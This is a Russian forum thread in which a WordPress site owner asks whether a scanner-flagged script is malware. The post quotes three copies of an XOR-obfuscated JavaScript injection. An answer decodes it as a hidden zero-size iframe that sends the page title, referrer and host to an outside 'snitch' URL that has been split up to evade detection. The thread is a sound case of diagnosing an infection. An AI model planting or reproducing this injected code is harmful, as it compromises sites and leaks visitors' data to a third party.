@Chekhoved

Данный скрипт — вирус?

Есть подозрение на наличие вредоносных скриптов на сайте WordPress
182096d591d54b23ac049268b663243f.jpg

Перевод:
Этот файл, как представляется, установлен хакером для выполнения вредоносных действий. Если вы знаете о этом файле вы можете выбрать, чтобы игнорировать его, чтобы исключить его из будущих проверок. Текст, который мы нашли в этом файле, который соответствует известной вредоносный файл является: "1Aqapkrv".

Вот скрипты. Это вирус?
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00cn'00'02)'02'00ac'00'02)'02'00pfk'00'02)'02'00c,n,a'00'02)'02'00mpgfk'00'02)'02'00qvpk`w'00'02)'02'00vg,'00'02)'02'00am'00'02)'02'00o'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>a


Если нет, что он делает?
  • Вопрос задан
  • 1336 просмотров
Решения вопроса 2
DIITHiTech
@DIITHiTech
Fullstack javascript developer
Ну ничего хорошего тут точно нет, кроме как вставки iframe
<script type="text/javascript">
	var referer = encodeURIComponent(document.referrer);
	var default_keyword = encodeURIComponent(document.title);
	var host = encodeURIComponent(location.host);
	var iframe = document.createElement('iframe');
	iframe.width=0;
	iframe.height=0;
	iframe.src= "h" + "tt" + "p://" + "c11n4." + "i.te" + "as" + "erg" + "uid" + "e.c" + "om" + "/snitch?d" + "ef" + "aul" + "t_k" + "ey" + "word=" + default_keyword + "&refe" + "rrer=" + referer + "&se_r" + "ef" + "er" + "rer=" + referer + "&sou" + "rce=" + host;
	document.body.appendChild(iframe);
</script>

еще и разбили url дабы не обнаруживался. c11n4.i.teaserguide.com/snitch?default_keyword=Tes...
Ответ написан
Комментировать
Punkie
@Punkie
Вероятнее всего. Обычно через unescape как раз всякие порно-баннеры внедряют либо снифферы форм.
Ответ написан
Комментировать
Пригласить эксперта
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы
summer Ярославль
от 100 000 до 140 000 ₽
КРАФТТЕК Санкт-Петербург
от 60 000 до 80 000 ₽
19 апр. 2024, в 20:43
20000 руб./за проект
19 апр. 2024, в 20:11
500 руб./за проект